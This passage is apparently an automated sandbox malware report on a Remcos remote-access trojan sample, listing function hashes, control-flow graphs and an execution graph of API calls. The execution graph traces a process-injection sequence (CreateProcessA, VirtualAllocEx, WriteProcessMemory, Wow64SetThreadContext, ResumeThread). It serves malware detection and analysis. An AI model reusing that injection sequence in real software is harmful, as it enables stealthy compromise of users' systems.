                                              • Opcode Fuzzy Hash: 69f667cf3744b15d7cd39b6144e2e6e7fe17c240b8c9cd9cba8b549926ceae91
                                              • Instruction Fuzzy Hash: 35212472504208DFDF09DF44E9C0B56BB75FF84324F24C169D80A0B746C336E446CAA2
                                              Function 012AD01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439754663.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_12ad000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1da0b0db46cbfeb3ca7926101df281161a5f3233425f51044cc68fe3c3fc52a6
                                              • Instruction ID: 22715534ed523906fa319450cc787ed849ea75aac8fc1f70a41d30063c212a86
                                              • Opcode Fuzzy Hash: 1da0b0db46cbfeb3ca7926101df281161a5f3233425f51044cc68fe3c3fc52a6
                                              • Instruction Fuzzy Hash: 82216471654308DFDB10DF64D8C0B26BB61FB88314F60C5ADD90A4B682C377D807CA62
                                              Function 012AD1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439754663.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_12ad000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e7ac1388af973017e256f259fe45a9a6229705cc6d719e349918ffb514445e1
                                              • Instruction ID: 7586c5a2134ced46e60a02f2d8d0e41a68099597b3656a0776f69c3764b1139d
                                              • Opcode Fuzzy Hash: 2e7ac1388af973017e256f259fe45a9a6229705cc6d719e349918ffb514445e1
                                              • Instruction Fuzzy Hash: 35213471524308EFEB01DF94C9C0B26BBA5FB84324F64C5ADE90A4B693C376D806CA61
                                              Function 012AD006 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439754663.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_12ad000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 19027add937eb6fcc6659b7c592322ff735ff463d0e3db1e8f8398594f6316b5
                                              • Instruction ID: 22f6b73d7d1ee573de56d01d6eaa384e56d763a64606908361e8d5b91cc10d04
                                              • Opcode Fuzzy Hash: 19027add937eb6fcc6659b7c592322ff735ff463d0e3db1e8f8398594f6316b5
                                              • Instruction Fuzzy Hash: 6321B0714483849FCB02CF64D994711BF71EB46314F28C5DAD9498F6A7C33A980ACB62
                                              Function 0117D3D3 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439614993.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_117d000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction ID: f5e8f0683ebadff1fecd43f0c4d647622d704ce3e113fcc934860a9679ae19c8
                                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction Fuzzy Hash: 8211CD72404244DFCF06CF44D5C0B56BF71FB84224F2482A9D80A0A656C33AE456CBA2
                                              Function 012AD1CF Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439754663.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_12ad000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: 2adf91436038efa660fb3395d77cd129640c627cc7532ccaec3f2ec42a62207a
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: A011BB75504284DFDB02CF54C5C4B15BBA1FB84324F28C6AAD9494BAA7C33AD44ACB61
                                              Function 0117D759 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439614993.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_117d000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2bce61906af7609ad2c55b3e7f8a5b91abcb62a48c090a9d3b84b0297e7513be
                                              • Instruction ID: cbc0daca9010fa7f9469798f06e51b975511ffa19a6c9fcf7d361706ca229999
                                              • Opcode Fuzzy Hash: 2bce61906af7609ad2c55b3e7f8a5b91abcb62a48c090a9d3b84b0297e7513be
                                              • Instruction Fuzzy Hash: 2E01A731104B889BEB185A99ED84B66FFA8DF41228F18855AED094A386C7799440C6B2
                                              Function 0117D758 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1439614993.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_117d000_iKgKaogJ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3305cfdd819d5e5c09e81cb68ef2dcdd6f73a3d6a169184ee67d88665aa3e1b2
                                              • Instruction ID: fd2b93c3126b713766b70e75f12a8a81840c4cb4d4b8ba47c94ef48061cff95e
                                              • Opcode Fuzzy Hash: 3305cfdd819d5e5c09e81cb68ef2dcdd6f73a3d6a169184ee67d88665aa3e1b2
                                              • Instruction Fuzzy Hash: 30F0C231004784AEEB148A0ADD84B62FFACEF40628F18C45AED084E386C3799840CBB1

                                              Execution Graph

                                              Execution Coverage:10.8%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:201
                                              Total number of Limit Nodes:7
                                              execution_graph 24151 141cfa0 24152 141cfe6 GetCurrentProcess 24151->24152 24154 141d031 24152->24154 24155 141d038 GetCurrentThread 24152->24155 24154->24155 24156 141d075 GetCurrentProcess 24155->24156 24157 141d06e 24155->24157 24158 141d0ab 24156->24158 24157->24156 24159 141d0d3 GetCurrentThreadId 24158->24159 24160 141d104 24159->24160 24406 141d5f0 DuplicateHandle 24407 141d686 24406->24407 24161 776b1b0 24162 776b33b 24161->24162 24164 776b1d6 24161->24164 24164->24162 24165 7764460 24164->24165 24166 776b430 PostMessageW 24165->24166 24167 776b49c 24166->24167 24167->24164 24408 7768200 24409 7768180 24408->24409 24411 7769f96 12 API calls 24409->24411 24412 7769f30 12 API calls 24409->24412 24413 7769f20 12 API calls 24409->24413 24410 77682b3 24411->24410 24412->24410 24413->24410 24168 1414668 24169 1414672 24168->24169 24173 1414758 24168->24173 24178 1413e34 24169->24178 24171 141468d 24174 141477d 24173->24174 24182 1414858 24174->24182 24186 1414868 24174->24186 24179 1413e3f 24178->24179 24194 1415c24 24179->24194 24181 1416faf 24181->24171 24183 141488f 24182->24183 24184 141496c 24183->24184 24190 14144b4 24183->24190 24187 141488f 24186->24187 24188 141496c 24187->24188 24189 14144b4 CreateActCtxA 24187->24189 24189->24188 24191 14158f8 CreateActCtxA 24190->24191 24193 14159bb 24191->24193 24195 1415c2f 24194->24195 24198 1415c44 24195->24198 24197 1417055 24197->24181 24199 1415c4f 24198->24199 24202 1415c74 24199->24202 24201 141713a 24201->24197 24203 1415c7f 24202->24203 24206 1415ca4 24203->24206 24205 141722d 24205->24201 24207 1415caf 24206->24207 24209 141852b 24207->24209 24212 141abdb 24207->24212 24208 1418569 24208->24205 24209->24208 24216 141ccd7 24209->24216 24221 141ac00 24212->24221 24226 141ac10 24212->24226 24213 141abee 24213->24209 24217 141ccf9 24216->24217 24218 141cd1d 24217->24218 24240 141ce77 24217->24240 24244 141ce88 24217->24244 24218->24208 24222 141ac10 24221->24222 24230 141acf9 24222->24230 24235 141ad08 24222->24235 24223 141ac1f 24223->24213 24228 141acf9 GetModuleHandleW 24226->24228 24229 141ad08 GetModuleHandleW 24226->24229 24227 141ac1f 24227->24213 24228->24227 24229->24227 24231 141ad3c 24230->24231 24232 141ad19 24230->24232 24231->24223 24232->24231 24233 141af40 GetModuleHandleW 24232->24233 24234 141af6d 24233->24234 24234->24223 24236 141ad19 24235->24236 24237 141ad3c 24235->24237 24236->24237 24238 141af40 GetModuleHandleW 24236->24238 24237->24223 24239 141af6d 24238->24239 24239->24223 24242 141ce95 24240->24242 24241 141cecf 24241->24218 24242->24241 24248 141ba40 24242->24248 24245 141ce95 24244->24245 24246 141cecf 24245->24246 24247 141ba40 2 API calls 24245->24247 24246->24218 24247->24246 24249 141ba45 24248->24249 24251 141dbe8 24249->24251 24252 141d23c 24249->24252 24251->24251 24253 141d247 24252->24253 24254 1415ca4 2 API calls 24253->24254 24255 141dc57 24254->24255 24255->24251 24256 7768079 24257 7767edc 24256->24257 24258 776815b 24257->24258 24262 7769f96 24257->24262 24277 7769f20 24257->24277 24291 7769f30 24257->24291 24263 7769f24 24262->24263 24265 7769f99 24262->24265 24264 7769eb5 24263->24264 24305 776a9de 24263->24305 24310 776a3f1 24263->24310 24315 776a690 24263->24315 24320 776a5b5 24263->24320 24325 776a5d5 24263->24325 24330 776a557 24263->24330 24335 776a476 24263->24335 24339 776a64d 24263->24339 24344 776a74c 24263->24344 24348 776ac4c 24263->24348 24353 776a4fd 24263->24353 24264->24258 24265->24258 24278 7769f24 24277->24278 24279 7769eb5 24278->24279 24280 776a476 2 API calls 24278->24280 24281 776a557 2 API calls 24278->24281 24282 776a5d5 2 API calls 24278->24282 24283 776a5b5 2 API calls 24278->24283 24284 776a690 2 API calls 24278->24284 24285 776a3f1 2 API calls 24278->24285 24286 776a9de 2 API calls 24278->24286 24287 776a4fd 2 API calls 24278->24287 24288 776ac4c 2 API calls 24278->24288 24289 776a74c 2 API calls 24278->24289 24290 776a64d 2 API calls 24278->24290 24279->24258 24280->24279 24281->24279 24282->24279 24283->24279 24284->24279 24285->24279 24286->24279 24287->24279 24288->24279 24289->24279 24290->24279 24292 7769f4a 24291->24292 24293 776a476 2 API calls 24292->24293 24294 776a557 2 API calls 24292->24294 24295 776a5d5 2 API calls 24292->24295 24296 776a5b5 2 API calls 24292->24296 24297 776a690 2 API calls 24292->24297 24298 776a3f1 2 API calls 24292->24298 24299 776a9de 2 API calls 24292->24299 24300 776a4fd 2 API calls 24292->24300 24301 7769f52 24292->24301 24302 776ac4c 2 API calls 24292->24302 24303 776a74c 2 API calls 24292->24303 24304 776a64d 2 API calls 24292->24304 24293->24301 24294->24301 24295->24301 24296->24301 24297->24301 24298->24301 24299->24301 24300->24301 24301->24258 24302->24301 24303->24301 24304->24301 24306 776a9e4 24305->24306 24358 77671b2 24306->24358 24362 77671b8 24306->24362 24307 776aa2f 24307->24264 24311 776a404 24310->24311 24366 7767ab4 24311->24366 24370 7767ac0 24311->24370 24316 776a5dc 24315->24316 24374 7767921 24316->24374 24378 7767928 24316->24378 24317 776a4da 24321 776a5bb 24320->24321 24382 7767830 24321->24382 24386 7767838 24321->24386 24322 776a8af 24326 776a5db 24325->24326 24327 776a4da 24326->24327 24328 7767921 ReadProcessMemory 24326->24328 24329 7767928 ReadProcessMemory 24326->24329 24328->24327 24329->24327 24331 776a61a 24330->24331 24390 7767770 24331->24390 24394 7767778 24331->24394 24332 776a638 24337 7767830 WriteProcessMemory 24335->24337 24338 7767838 WriteProcessMemory 24335->24338 24336 776a4a4 24336->24264 24337->24336 24338->24336 24340 776a65a 24339->24340 24342 77671b2 ResumeThread 24340->24342 24343 77671b8 ResumeThread 24340->24343 24341 776aa2f 24341->24264 24342->24341 24343->24341 24398 77676a0 24344->24398 24402 7767698 24344->24402 24345 776a766 24349 776ad81 24348->24349 24351 77676a0 Wow64SetThreadContext 24349->24351 24352 7767698 Wow64SetThreadContext 24349->24352 24350 776ad9c 24351->24350 24352->24350 24354 776a50a 24353->24354 24356 7767830 WriteProcessMemory 24354->24356 24357 7767838 WriteProcessMemory 24354->24357 24355 776a45d 24356->24355 24357->24355 24359 77671b8 ResumeThread 24358->24359 24361 7767229 24359->24361 24361->24307 24363 77671bd ResumeThread 24362->24363 24365 7767229 24363->24365 24365->24307 24367 7767ac0 CreateProcessA 24366->24367 24369 7767d0b 24367->24369 24371 7767ac5 CreateProcessA 24370->24371 24373 7767d0b 24371->24373 24375 7767973 ReadProcessMemory 24374->24375 24377 77679b7 24375->24377 24377->24317 24379 7767973 ReadProcessMemory 24378->24379 24381 77679b7 24379->24381 24381->24317 24383 7767838 WriteProcessMemory 24382->24383 24385 77678d7 24383->24385 24385->24322 24387 776783d WriteProcessMemory 24386->24387 24389 77678d7 24387->24389 24389->24322 24391 7767778 VirtualAllocEx 24390->24391 24393 77677f5 24391->24393 24393->24332 24395 776777d VirtualAllocEx 24394->24395 24397 77677f5 24395->24397 24397->24332 24399 77676a5 Wow64SetThreadContext 24398->24399 24401 776772d 24399->24401 24401->24345 24403 77676a0 Wow64SetThreadContext 24402->24403 24405 776772d 24403->24405 24405->24345

                                              Executed Functions

                                              Function 0141CF90 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0141D01E
                                              • GetCurrentThread.KERNEL32 ref: 0141D05B
                                              • GetCurrentProcess.KERNEL32 ref: 0141D098
                                              • GetCurrentThreadId.KERNEL32 ref: 0141D0F1
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: b29ffdf44a7d9cdf87dced3ec2772619e87ffcd184397c009b43fdb091801c40
                                              • Instruction ID: d05f99f7ee54e74411478398cb7d3952479b06e813ec7a366bf643ba05756992
                                              • Opcode Fuzzy Hash: b29ffdf44a7d9cdf87dced3ec2772619e87ffcd184397c009b43fdb091801c40
                                              • Instruction Fuzzy Hash: 3B5167B0D017498FEB14CFA9D948BDEBFF1AF88314F20849AD419A73A0D7785944CB26
                                              Function 0141CFA0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0141D01E
                                              • GetCurrentThread.KERNEL32 ref: 0141D05B
                                              • GetCurrentProcess.KERNEL32 ref: 0141D098
                                              • GetCurrentThreadId.KERNEL32 ref: 0141D0F1
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 7e0d440cab35f19a1e6896ffc30793db26a8cc70cf4a0d989d064ae0d877f7a0
                                              • Instruction ID: f2d629fb146840f618dfe3e5cb0f9031b9d3fc2f8c2c6bc92d3927c1e23e22ce
                                              • Opcode Fuzzy Hash: 7e0d440cab35f19a1e6896ffc30793db26a8cc70cf4a0d989d064ae0d877f7a0
                                              • Instruction Fuzzy Hash: E55178B0D017498FDB14CFAAD548BDEBBF1AF88314F20845AD418A73A0D7745944CF66
                                              Function 07767AB4 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 44 7767ab4-7767abe 45 7767ac5-7767b55 44->45 46 7767ac0-7767ac4 44->46 48 7767b57-7767b61 45->48 49 7767b8e-7767bae 45->49 46->45 48->49 50 7767b63-7767b65 48->50 54 7767be7-7767c16 49->54 55 7767bb0-7767bba 49->55 52 7767b67-7767b71 50->52 53 7767b88-7767b8b 50->53 56 7767b75-7767b84 52->56 57 7767b73 52->57 53->49 65 7767c4f-7767d09 CreateProcessA 54->65 66 7767c18-7767c22 54->66 55->54 58 7767bbc-7767bbe 55->58 56->56 59 7767b86 56->59 57->56 60 7767bc0-7767bca 58->60 61 7767be1-7767be4 58->61 59->53 63 7767bce-7767bdd 60->63 64 7767bcc 60->64 61->54 63->63 67 7767bdf 63->67 64->63 77 7767d12-7767d98 65->77 78 7767d0b-7767d11 65->78 66->65 68 7767c24-7767c26 66->68 67->61 70 7767c28-7767c32 68->70 71 7767c49-7767c4c 68->71 72 7767c36-7767c45 70->72 73 7767c34 70->73 71->65 72->72 74 7767c47 72->74 73->72 74->71 88 7767d9a-7767d9e 77->88 89 7767da8-7767dac 77->89 78->77 88->89 90 7767da0 88->90 91 7767dae-7767db2 89->91 92 7767dbc-7767dc0 89->92 90->89 91->92 93 7767db4 91->93 94 7767dc2-7767dc6 92->94 95 7767dd0-7767dd4 92->95 93->92 94->95 98 7767dc8 94->98 96 7767de6-7767ded 95->96 97 7767dd6-7767ddc 95->97 99 7767e04 96->99 100 7767def-7767dfe 96->100 97->96 98->95 102 7767e05 99->102 100->99 102->102
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07767CF6
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: a1c42f1d7b8276e7fc1410277c71ff4af423f29202a5b3b2cad8f6b96cfeec4c
                                              • Instruction ID: c11ac8f6d901e87d133f5c02d6b446145dcacb5f6cd2b2db7f4b19f1f7facaa1
                                              • Opcode Fuzzy Hash: a1c42f1d7b8276e7fc1410277c71ff4af423f29202a5b3b2cad8f6b96cfeec4c
                                              • Instruction Fuzzy Hash: 44A17BB1D0031ACFEB24CF68C8457EEBBB2BF45394F148569E808A7244DB759985CF91
                                              Function 07767AC0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 103 7767ac0-7767b55 106 7767b57-7767b61 103->106 107 7767b8e-7767bae 103->107 106->107 108 7767b63-7767b65 106->108 112 7767be7-7767c16 107->112 113 7767bb0-7767bba 107->113 110 7767b67-7767b71 108->110 111 7767b88-7767b8b 108->111 114 7767b75-7767b84 110->114 115 7767b73 110->115 111->107 123 7767c4f-7767d09 CreateProcessA 112->123 124 7767c18-7767c22 112->124 113->112 116 7767bbc-7767bbe 113->116 114->114 117 7767b86 114->117 115->114 118 7767bc0-7767bca 116->118 119 7767be1-7767be4 116->119 117->111 121 7767bce-7767bdd 118->121 122 7767bcc 118->122 119->112 121->121 125 7767bdf 121->125 122->121 135 7767d12-7767d98 123->135 136 7767d0b-7767d11 123->136 124->123 126 7767c24-7767c26 124->126 125->119 128 7767c28-7767c32 126->128 129 7767c49-7767c4c 126->129 130 7767c36-7767c45 128->130 131 7767c34 128->131 129->123 130->130 132 7767c47 130->132 131->130 132->129 146 7767d9a-7767d9e 135->146 147 7767da8-7767dac 135->147 136->135 146->147 148 7767da0 146->148 149 7767dae-7767db2 147->149 150 7767dbc-7767dc0 147->150 148->147 149->150 151 7767db4 149->151 152 7767dc2-7767dc6 150->152 153 7767dd0-7767dd4 150->153 151->150 152->153 156 7767dc8 152->156 154 7767de6-7767ded 153->154 155 7767dd6-7767ddc 153->155 157 7767e04 154->157 158 7767def-7767dfe 154->158 155->154 156->153 160 7767e05 157->160 158->157 160->160
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07767CF6
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 272f26b9f16520c314cb2554131201580fe22675d8f5128467680b148741441a
                                              • Instruction ID: 20e017b8ea1fa37799416fe2e61158a801c712d7c33d8296b2cdb988eb930fd6
                                              • Opcode Fuzzy Hash: 272f26b9f16520c314cb2554131201580fe22675d8f5128467680b148741441a
                                              • Instruction Fuzzy Hash: F8917CB1D0031ACFEB24CF68C845BEEBBB2BF45394F148569E808A7244DB759985CF91
                                              Function 0141AD08 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 161 141ad08-141ad17 162 141ad43-141ad47 161->162 163 141ad19-141ad26 call 141a02c 161->163 164 141ad49-141ad53 162->164 165 141ad5b-141ad9c 162->165 170 141ad28 163->170 171 141ad3c 163->171 164->165 172 141ada9-141adb7 165->172 173 141ad9e-141ada6 165->173 218 141ad2e call 141af90 170->218 219 141ad2e call 141afa0 170->219 171->162 174 141adb9-141adbe 172->174 175 141addb-141addd 172->175 173->172 179 141adc0-141adc7 call 141a038 174->179 180 141adc9 174->180 178 141ade0-141ade7 175->178 176 141ad34-141ad36 176->171 177 141ae78-141af38 176->177 211 141af40-141af6b GetModuleHandleW 177->211 212 141af3a-141af3d 177->212 182 141adf4-141adfb 178->182 183 141ade9-141adf1 178->183 181 141adcb-141add9 179->181 180->181 181->178 185 141ae08-141ae11 call 141a048 182->185 186 141adfd-141ae05 182->186 183->182 192 141ae13-141ae1b 185->192 193 141ae1e-141ae23 185->193 186->185 192->193 194 141ae41-141ae45 193->194 195 141ae25-141ae2c 193->195 216 141ae48 call 141b270 194->216 217 141ae48 call 141b2a0 194->217 195->194 197 141ae2e-141ae3e call 141a058 call 141a068 195->197 197->194 198 141ae4b-141ae4e 201 141ae71-141ae77 198->201 202 141ae50-141ae6e 198->202 202->201 213 141af74-141af88 211->213 214 141af6d-141af73 211->214 212->211 214->213 216->198 217->198 218->176 219->176
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0141AF5E
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 64b075c12deecec8e2192fed35c899372638a7ac6e96a6eadc48a95b8aed4414
                                              • Instruction ID: 75165a0f51336e5ba10635baa87aa1d1c814169531760c261bdc587bb084805f
                                              • Opcode Fuzzy Hash: 64b075c12deecec8e2192fed35c899372638a7ac6e96a6eadc48a95b8aed4414
                                              • Instruction Fuzzy Hash: 7E7147B0A01B458FE725DF2AD04075ABBF2FF48204F10892ED48AD7B54D775E849CB90
                                              Function 014158EC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 220 14158ec-14159b9 CreateActCtxA 222 14159c2-1415a1c 220->222 223 14159bb-14159c1 220->223 230 1415a2b-1415a2f 222->230 231 1415a1e-1415a21 222->231 223->222 232 1415a31-1415a3d 230->232 233 1415a40 230->233 231->230 232->233 235 1415a41 233->235 235->235
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 014159A9
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 7ed78a08683671ce2db452d3e449d42fe54b5a74e8ac54fec3c9f0fd781b9f7f
                                              • Instruction ID: e693b6658657bc3cc8be892476f80230e5efa9fc551b976f060e03c93e78ab00
                                              • Opcode Fuzzy Hash: 7ed78a08683671ce2db452d3e449d42fe54b5a74e8ac54fec3c9f0fd781b9f7f
                                              • Instruction Fuzzy Hash: C341E370C10759CFEB24CFA9C8847DEBBB6BF89304F24806AD418AB255DB75594ACF50
                                              Function 014144B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 236 14144b4-14159b9 CreateActCtxA 239 14159c2-1415a1c 236->239 240 14159bb-14159c1 236->240 247 1415a2b-1415a2f 239->247 248 1415a1e-1415a21 239->248 240->239 249 1415a31-1415a3d 247->249 250 1415a40 247->250 248->247 249->250 252 1415a41 250->252 252->252
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 014159A9
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 1b89a78307d857af77741ffcd3258175d14ae1b1d5443beebb0a07f46d05ef93
                                              • Instruction ID: 8a3ab2e3977aa9e90c9975ad62dd85476cb0f4e2f5629f6a090ced0249a0339a
                                              • Opcode Fuzzy Hash: 1b89a78307d857af77741ffcd3258175d14ae1b1d5443beebb0a07f46d05ef93
                                              • Instruction Fuzzy Hash: 8E41D270C10719CFEB24DFAAC8447CEBBB5BF89304F20806AD418AB255DB756949CF90
                                              Function 07767830 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 253 7767830-7767836 254 776783d-7767886 253->254 255 7767838-776783c 253->255 257 7767896-77678d5 WriteProcessMemory 254->257 258 7767888-7767894 254->258 255->254 260 77678d7-77678dd 257->260 261 77678de-776790e 257->261 258->257 260->261
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077678C8
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: bbe0200bae26ef9d133a816e7864056189eb265fd92bbef4402f86c7982f9596
                                              • Instruction ID: b24a9d5cfb1c6eb3c6aa6cd4eb05327834d3f17dcff4877f9467d3bebfbefb4d
                                              • Opcode Fuzzy Hash: bbe0200bae26ef9d133a816e7864056189eb265fd92bbef4402f86c7982f9596
                                              • Instruction Fuzzy Hash: 582137B590031A9FDB14CFA9C884BDEBBF5FF48354F108829E918A7240D7789944CBA0
                                              Function 07767838 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 265 7767838-7767886 268 7767896-77678d5 WriteProcessMemory 265->268 269 7767888-7767894 265->269 271 77678d7-77678dd 268->271 272 77678de-776790e 268->272 269->268 271->272
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077678C8
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: b83a6e333444cf6434783596d8a04ad6bc0fdf4aeb1b9453309ae02281da496e
                                              • Instruction ID: 543725d2191457bff0c10ef44fa85153b4d6f64d08085bb03462b62a730ba2a6
                                              • Opcode Fuzzy Hash: b83a6e333444cf6434783596d8a04ad6bc0fdf4aeb1b9453309ae02281da496e
                                              • Instruction Fuzzy Hash: 00212AB590030A9FDB10CFA9C885BDEBBF5FF48310F148829E958A7240D7789944CFA1
                                              Function 07767698 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
